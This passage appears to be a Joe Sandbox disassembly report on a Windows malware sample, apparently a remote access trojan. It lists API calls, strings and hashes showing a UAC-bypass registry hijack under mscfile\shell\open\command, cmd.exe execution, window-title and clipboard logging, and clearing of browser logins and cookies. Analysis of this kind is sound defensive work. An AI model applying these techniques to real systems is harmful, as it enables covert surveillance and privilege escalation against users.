                        • Opcode ID: 07dcd5cdd291a6416836d0c86817599069bcc3367b78dc6d1ec70403740c8f80
                        • Instruction ID: 5123bbd1fc4d669f1c4d6c1cc045f4f856aea5ad0ec182f95f4946492138bf11
                        • Opcode Fuzzy Hash: 07dcd5cdd291a6416836d0c86817599069bcc3367b78dc6d1ec70403740c8f80
                        • Instruction Fuzzy Hash: 0401A261E44208BAD714EAD1C853FBA73689B64705F10806FB911751C2EA7DAA4E862F
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                        • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                        • RegCloseKey.ADVAPI32(00000000), ref: 00412128
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenQueryValue
                        • String ID: origmsc
                        • API String ID: 3677997916-68016026
                        • Opcode ID: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
                        • Instruction ID: 61f3e32b1c93232b19bf4a4cc48abe95026028d342b1827e6ec6edb2467bbf34
                        • Opcode Fuzzy Hash: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
                        • Instruction Fuzzy Hash: 4C014B31800229BBCF219F91DC49DEB7F29EF05761F0141A5BE08A2161D63589BADBA4
                        APIs
                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041487B
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExecuteShell
                        • String ID: /C $cmd.exe$open
                        • API String ID: 587946157-3896048727
                        • Opcode ID: e8ae4e63c9dc0d6232b12cfcea10d76e3d0f37ee2c59ec5f687c9fc8ea61ff61
                        • Instruction ID: 0094db9d050c86e8b7efcb7c1e993d1de0046a6f7675c6b5aa1ef49a358ded74
                        • Opcode Fuzzy Hash: e8ae4e63c9dc0d6232b12cfcea10d76e3d0f37ee2c59ec5f687c9fc8ea61ff61
                        • Instruction Fuzzy Hash: 8FF017712083049BC304FBB5DC91DEFB39CAB90348F50493FB556921E2EE789949C65A
                        APIs
                        • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                        • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                        • RegCloseKey.ADVAPI32(00000000), ref: 00412054
                        Strings
                        • http\shell\open\command, xrefs: 00412026
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenQueryValue
                        • String ID: http\shell\open\command
                        • API String ID: 3677997916-1487954565
                        • Opcode ID: b2b53b33f668fea9d6b70683008644784a8f2d8740eef6bc6becda6435671858
                        • Instruction ID: 0e37d8025f140bc42ec1a8b72352379eb981339daaa9ecb07b48012be1c394e8
                        • Opcode Fuzzy Hash: b2b53b33f668fea9d6b70683008644784a8f2d8740eef6bc6becda6435671858
                        • Instruction Fuzzy Hash: C5F0C271500218FBDB609B95DC49EDFBBBCEB84B12F1040A6BA04E2150DAB55F98C7A5
                        APIs
                        • RegCreateKeyW.ADVAPI32(80000001,Software\Classes\mscfile\shell\open\command,0046FB08), ref: 0041220F
                        • RegSetValueExW.ADVAPI32(0046FB08,00469654,00000000,00000000,00000000,00000000,00469654,?,80000001,?,0040674F,00469654,0046FB08), ref: 0041223E
                        • RegCloseKey.ADVAPI32(0046FB08,?,80000001,?,0040674F,00469654,0046FB08), ref: 00412249
                        Strings
                        • Software\Classes\mscfile\shell\open\command, xrefs: 0041220D
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateValue
                        • String ID: Software\Classes\mscfile\shell\open\command
                        • API String ID: 1818849710-505396733
                        • Opcode ID: 3e3fd8a80b9e4d87c81bb3c401438d747e56ec0492b29cf55bc65580399ff691
                        • Instruction ID: 05e6d75f170e8ecdfe9b8062019ada1801530107581382ed9d20477649f1572c
                        • Opcode Fuzzy Hash: 3e3fd8a80b9e4d87c81bb3c401438d747e56ec0492b29cf55bc65580399ff691
                        • Instruction Fuzzy Hash: A1F0AF71440218BBCF00DFA1ED45AEE376CEF44755F00816ABC05A61A1E63A9E14DA94
                        APIs
                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040C9D9
                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CA18
                          • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 0043340C
                          • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 00433430
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CA3E
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                        • String ID: bad locale name
                        • API String ID: 3628047217-1405518554
                        • Opcode ID: 082478905eeced14d5731d6393d842c9ba169a160db0ba1d03fb3bfa15736ecf
                        • Instruction ID: 2c4ad0125759e8972babdbfe9bad97e9a7b68ba46d49635da0f31685b809246c
                        • Opcode Fuzzy Hash: 082478905eeced14d5731d6393d842c9ba169a160db0ba1d03fb3bfa15736ecf
                        • Instruction Fuzzy Hash: 6EF01232500604FAC328FBA6DC5299A77A49F14719F508D3FF545214D1FF396A18C699
                        APIs
                        • RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
                        • RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
                        • RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateValue
                        • String ID: P0F
                        • API String ID: 1818849710-3540264436
                        • Opcode ID: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
                        • Instruction ID: aa9041bc7d36289a95917c0f975a521a353b8518001b5fa9068edf17b8c75ad2
                        • Opcode Fuzzy Hash: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
                        • Instruction Fuzzy Hash: 05E03972600308BBDB209FA09D05FEA7B6CEF04B62F1141A5BF09A6591D2758E14A7A8
                        APIs
                        • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013FC
                        • GetProcAddress.KERNEL32(00000000), ref: 00401403
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: GetCursorInfo$User32.dll
                        • API String ID: 1646373207-2714051624
                        • Opcode ID: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
                        • Instruction ID: b28a71f0ab0cd05a0e9183a6667f806437ada0decc35e30242c3667109896680
                        • Opcode Fuzzy Hash: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
                        • Instruction Fuzzy Hash: 8BB09BB5741301BB8A017B705E0D905357C550470375102A3B00386161F7F44500C61E
                        APIs
                        • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014A1
                        • GetProcAddress.KERNEL32(00000000), ref: 004014A8
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: GetLastInputInfo$User32.dll
                        • API String ID: 2574300362-1519888992
                        • Opcode ID: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
                        • Instruction ID: 9c97512ccc3e9dae7fbe55962af9901819d65f6a69b3e33b2a0b565c767961ff
                        • Opcode Fuzzy Hash: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
                        • Instruction Fuzzy Hash: 51B092B1980302AB8E006FB1AE0DE043AB8A604703B5102B6B00292161EAF99440CF2E
                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: __alldvrm$_strrchr
                        • String ID:
                        • API String ID: 1036877536-0
                        • Opcode ID: ffe43cf3e465c727d5e0953a870d72e00f4610d42b915cf7dfa75284df7637f7
                        • Instruction ID: 8a3f88530d83194aa24a517e4ef6e15a272d99a70002873db7a8ab856bdac54d
                        • Opcode Fuzzy Hash: ffe43cf3e465c727d5e0953a870d72e00f4610d42b915cf7dfa75284df7637f7
                        • Instruction Fuzzy Hash: 18A12572A012869FFB21CE18C8817AEBBA1EF65314F24416FE5859B382CA3C8941C759
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
                        • Instruction ID: c1abd53b49e6a7723cad7358b49d7c046164203d86e3a19123cc85c40c5f12b7
                        • Opcode Fuzzy Hash: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
                        • Instruction Fuzzy Hash: 93412871E00704AFD7249F79CC46B5A7BA9EB8C714F10523FF142DB681D37999498788
                        APIs
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00471EE8), ref: 00404D93
                        • CreateThread.KERNEL32(00000000,00000000,?,00471E90,00000000,00000000), ref: 00404DA7
                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DB2
                        • CloseHandle.KERNEL32(?,?,00000000), ref: 00404DBB
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                        • String ID:
                        • API String ID: 3360349984-0
                        • Opcode ID: 4507b0ab51a6c89f5a00a7e6d16978d5bd04c0451300ea21d68f1003f035869f
                        • Instruction ID: 0d5bef4af40d9751d8a4c840d6feadb85822b330c50e1cee3accc81e25362d00
                        • Opcode Fuzzy Hash: 4507b0ab51a6c89f5a00a7e6d16978d5bd04c0451300ea21d68f1003f035869f
                        • Instruction Fuzzy Hash: DA4194712083016FCB11FB61CD55D6FB7EDAFD4314F400A3EB982A32E2DB7899098666
                        APIs
                        Strings
                        • Cleared browsers logins and cookies., xrefs: 0040B036
                        • [Cleared browsers logins and cookies.], xrefs: 0040B025
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                        • API String ID: 3472027048-1236744412
                        • Opcode ID: c5625c41e3350cd44f31e3f39ca14d3df05c6bc0ef5032128f41299be6cd647b
                        • Instruction ID: 9e673e540e653d5dfc9c41bfd33b173fe745421aa21f598ea7623546fa890e2b
                        • Opcode Fuzzy Hash: c5625c41e3350cd44f31e3f39ca14d3df05c6bc0ef5032128f41299be6cd647b
                        • Instruction Fuzzy Hash: EE31A24074C3826EDA11BBB555267EF6B924A53758F0844BFF8C42B3C3D9BA4818936F
                        APIs
                          • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                          • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                          • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                        • Sleep.KERNEL32(00000BB8), ref: 004111DF
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenQuerySleepValue
                        • String ID: H"G$exepath$!G
                        • API String ID: 4119054056-2148977334
                        • Opcode ID: b63ef4792b0a54595826799ca09291a4a0f263f6c30614dda09e5540f09a92a9
                        • Instruction ID: cc1704131a0fe244d5c58522e2247ad29464f3afd50ace533094a5add093a815
                        • Opcode Fuzzy Hash: b63ef4792b0a54595826799ca09291a4a0f263f6c30614dda09e5540f09a92a9
                        • Instruction Fuzzy Hash: 2321F7A1B0030426DA00B7765D56AAF724D8B84308F00447FBE46F72E3DEBC9D0981AD
                        APIs
                          • Part of subcall function 0041A2DB: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A2EB
                          • Part of subcall function 0041A2DB: GetWindowTextLengthW.USER32(00000000), ref: 0041A2F4
                          • Part of subcall function 0041A2DB: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041A31E
                        • Sleep.KERNEL32(000001F4), ref: 0040955A
                        • Sleep.KERNEL32(00000064), ref: 004095F5
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Window$SleepText$ForegroundLength
                        • String ID: [ $ ]
                        • API String ID: 3309952895-93608704
                        • Opcode ID: 1543f2ebe3b39a11f32b2ab7ee3d2400f3e72a61424cc91a421d40b22e495c0c
                        • Instruction ID: f130b1bb1348f748448b569433b56ba5176942d51498ef551544d7c0cb15bd34
                        • Opcode Fuzzy Hash: 1543f2ebe3b39a11f32b2ab7ee3d2400f3e72a61424cc91a421d40b22e495c0c
                        • Instruction Fuzzy Hash: 2721657160420067C618B776DC179AE32A89F51308F40447FF552772D3EE7D9A05869F
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 87cf1a99992dac899311e5f70d4e339ac3b3345b823034c77296a488e3312c11
                        • Instruction ID: cddd12244c82da27d8fba5a3cfb3b4b8374ea1530061808fe1103b2c2b1f06f2
                        • Opcode Fuzzy Hash: 87cf1a99992dac899311e5f70d4e339ac3b3345b823034c77296a488e3312c11
                        • Instruction Fuzzy Hash: 46018FB26092163EF6302E796CC1F67271CDF517B9B21033BF625622D2EAB8CD254568
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0a806abc81d082e1cec901e4614177c074956c5300ea34d23f617e0004ee84c8
                        • Instruction ID: ded37596ea74bb71ca552df42b40a6491f306b500b676c7390fdbb9d5d89f826
                        • Opcode Fuzzy Hash: 0a806abc81d082e1cec901e4614177c074956c5300ea34d23f617e0004ee84c8
                        • Instruction Fuzzy Hash: E801D1B220A2163EB6202E796CC9D27631DEF513BE725033BF521522E6EF7DCC855168
                        APIs
                        • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                        • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A23C
                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A261
                        • CloseHandle.KERNEL32(00000000,?,00000000,0040410F,00462E24), ref: 0041A26F
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleReadSize
                        • String ID:
                        • API String ID: 3919263394-0
                        • Opcode ID: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
                        • Instruction ID: 89bb00dd3d40589ea0a8ab1c68f17f151e0eed20b013a8aeca2898ab58bcd068
                        • Opcode Fuzzy Hash: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
                        • Instruction Fuzzy Hash: 6EF0F6B13023087FE6102B21AC84FBF369CDB867A5F01027EF901A32C1CA3A8C054536
                        APIs
                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00436CD1
                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00436CD6
                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00436CDB
                          • Part of subcall function 004381DA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004381EB
                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00436CF0
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                        • String ID:
                        • API String ID: 1761009282-0
                        • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                        • Instruction ID: fe0629a2579d5eb29aad24ff52ac89f8c4d28ee3f0e2161d733d9faf058f7893
                        • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                        • Instruction Fuzzy Hash: 12C00254040342742C5077B622062AEA350A8AE38DFA7B4CFB892171038D0D440B953F
                        APIs
                        • __startOneArgErrorHandling.LIBCMT ref: 004401ED
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorHandling__start
                        • String ID: pow
                        • API String ID: 3213639722-2276729525
                        • Opcode ID: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                        • Instruction ID: 9a83a7e01686381b8a8ce0b853cf5bc52d75b03c70b61edc7fb1f4b11142e615
                        • Opcode Fuzzy Hash: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                        • Instruction Fuzzy Hash: 21518A60A842018AFB117714CA4137B3B90EB40701F248DABE5D2563EAEB7D8CB5DA4F
                        APIs
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404046
                          • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                          • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                          • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                          • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                        • Sleep.KERNEL32(000000FA,00462E24), ref: 00404118
                        Strings
                        • /sort "Visit Time" /stext ", xrefs: 00404092
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                        • String ID: /sort "Visit Time" /stext "
                        • API String ID: 368326130-1573945896
                        • Opcode ID: a4a6769404a45eb771fb951e36bc417e5ca480f2d31eb92d27795bae4adf2828
                        • Instruction ID: 7f8942f24ccac46b0034012f494d3192eca769648d2eef92b07e1d28e9d76a7f
                        • Opcode Fuzzy Hash: a4a6769404a45eb771fb951e36bc417e5ca480f2d31eb92d27795bae4adf2828
                        • Instruction Fuzzy Hash: B5316431A0021556CB14FBB6DC969EE73B9AF90308F40017FF506B71E2EE38594ACA99
                        APIs
                          • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                        • __Init_thread_footer.LIBCMT ref: 0040A6E3
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Init_thread_footer__onexit
                        • String ID: [End of clipboard]$[Text copied to clipboard]
                        • API String ID: 1881088180-3686566968
                        • Opcode ID: 8b3756b0909f45d78d669578ef8912b34d58c84c6c9fb6c8f8edd64ed624e4fc
                        • Instruction ID: 89f5e7c07999504d217297f9a041c68b3e0b8c5632e5b70e4a6c966e9d45e494
                        • Opcode Fuzzy Hash: 8b3756b0909f45d78d669578ef8912b34d58c84c6c9fb6c8f8edd64ed624e4fc
                        • Instruction Fuzzy Hash: 42218D31A002055ACB04FBA5D892DEDB378AF54308F10453FF506771D2EF38AE4A8A8D
                        APIs
                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0044EF72,?,00000050,?,?,?,?,?), ref: 0044EDF2
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ACP$OCP
                        • API String ID: 0-711371036
                        • Opcode ID: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
                        • Instruction ID: ce4b6ecbf16ce97eee8671cf775368e41a8ae942868fb71505acbacd33d5bec2
                        • Opcode Fuzzy Hash: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
                        • Instruction Fuzzy Hash: 4F21F1E2E00102A2FB348B67CC01BAB72A6FF54B51F568426E90AD7300EB3ADD41C35C
                        APIs
                        • GetWindowTextW.USER32(?,?,0000012C), ref: 00415B2E
                        • IsWindowVisible.USER32(?), ref: 00415B37
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Window$TextVisible
                        • String ID: (%G
                        • API String ID: 1670992164-3377777310
                        • Opcode ID: 6f17d284cfdb4df53722abd5a13ccbba9f2a9602f3f7b51a6171a740e00953ec
                        • Instruction ID: 7bdbcb6602ffb42e5ce2137d58ff1a132c15f169860b2e192372582f8912ca7a
                        • Opcode Fuzzy Hash: 6f17d284cfdb4df53722abd5a13ccbba9f2a9602f3f7b51a6171a740e00953ec
                        • Instruction Fuzzy Hash: E42166315182019BC314FB61D891EEFB7E9AF94304F50493FF49A920E2FF349A49CA5A
                        APIs
                        • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405010
                          • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                        • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405067
                        Strings
                        • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404FFF
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: LocalTime
                        • String ID: Connection KeepAlive | Enabled | Timeout:
                        • API String ID: 481472006-507513762
                        • Opcode ID: db71296423f5ae0c940390bca2fe76bdaa24d7f5692d89ec5d6dad89ab0214d4
                        • Instruction ID: 0beb7a88d254a358a963561f9d97893b624dd36ca90e96b80d49a5b3b1f878f3
                        • Opcode Fuzzy Hash: db71296423f5ae0c940390bca2fe76bdaa24d7f5692d89ec5d6dad89ab0214d4
                        • Instruction Fuzzy Hash: 092137719042406BD304B7219D2976F7794A745308F04047EF845132E2DBBD5988CB9F
                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00432D8F
                        • ___raise_securityfailure.LIBCMT ref: 00432E76
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: FeaturePresentProcessor___raise_securityfailure
                        • String ID: (F
                        • API String ID: 3761405300-3109638091
                        • Opcode ID: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
                        • Instruction ID: 494dc9d0fce29d31cb3ef34e393fed80e8221b4646dfbf54f91bf1ae82b1ca01
                        • Opcode Fuzzy Hash: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
                        • Instruction Fuzzy Hash: 8C21F0BD500205DEE700DF16E9856403BE4BB49314F20943AE9088B3A1F3F669918F9F
                        APIs
                        • GetLocalTime.KERNEL32(00000000), ref: 004194F4
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: LocalTime
                        • String ID: | $%02i:%02i:%02i:%03i
                        • API String ID: 481472006-2430845779
                        • Opcode ID: 3ac86647c9e14ca6f93bd036f528b1de7b867f3a903355216a00816ff0bb3ae2
                        • Instruction ID: bce8772fa89f7f7ff9e68bb522557632f538b64cb503c22793e2f51f4d03e72f
                        • Opcode Fuzzy Hash: 3ac86647c9e14ca6f93bd036f528b1de7b867f3a903355216a00816ff0bb3ae2
